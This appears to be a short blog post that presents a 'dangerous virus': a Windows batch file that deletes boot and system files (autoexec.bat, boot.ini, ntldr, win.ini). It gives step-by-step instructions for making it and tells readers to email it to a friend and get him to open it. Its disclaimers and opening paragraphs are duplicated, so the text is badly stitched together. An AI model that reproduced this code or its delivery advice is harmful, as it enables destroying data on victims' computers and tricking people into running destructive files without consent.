The Dangerous virus on the way to post
Please don't try to open this file after creation in your own Computer. It may cause your system to delete all the useful information which may divert to re-install you whole Operating system again...
If you are gonna test this link just create the file and then mail to your friend. and make him to open that file in their system and see the change. This is just for demonstration of how the virus programming will be? please don't miss-use this code of your personal or administrative use.
The Virus programing to be initiated was to do steps:
Note : Please don't try this virus in your own system. if you want to test the virus by you own then please use the Sun virtual box software (That tests the virus by it's own).
Please don't try to open this file after creation in your own Computer. It may cause your system to delete all the useful information which may divert to re-install you whole Operating system again...
If you are gonna test this link just create the file and then mail to your friend. and make him to open that file in their system and see the change. This is just for demonstration of how the virus programming will be? please don't miss-use this code of your personal or administrative use.
The Virus programing to be initiated was to do steps:
- Open the Notepad.
- And type the below code in that notepad@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini - Save this file as "(your defined name)".bat for example i save it as virus.bat.
Note : Please don't try this virus in your own system. if you want to test the virus by you own then please use the Sun virtual box software (That tests the virus by it's own).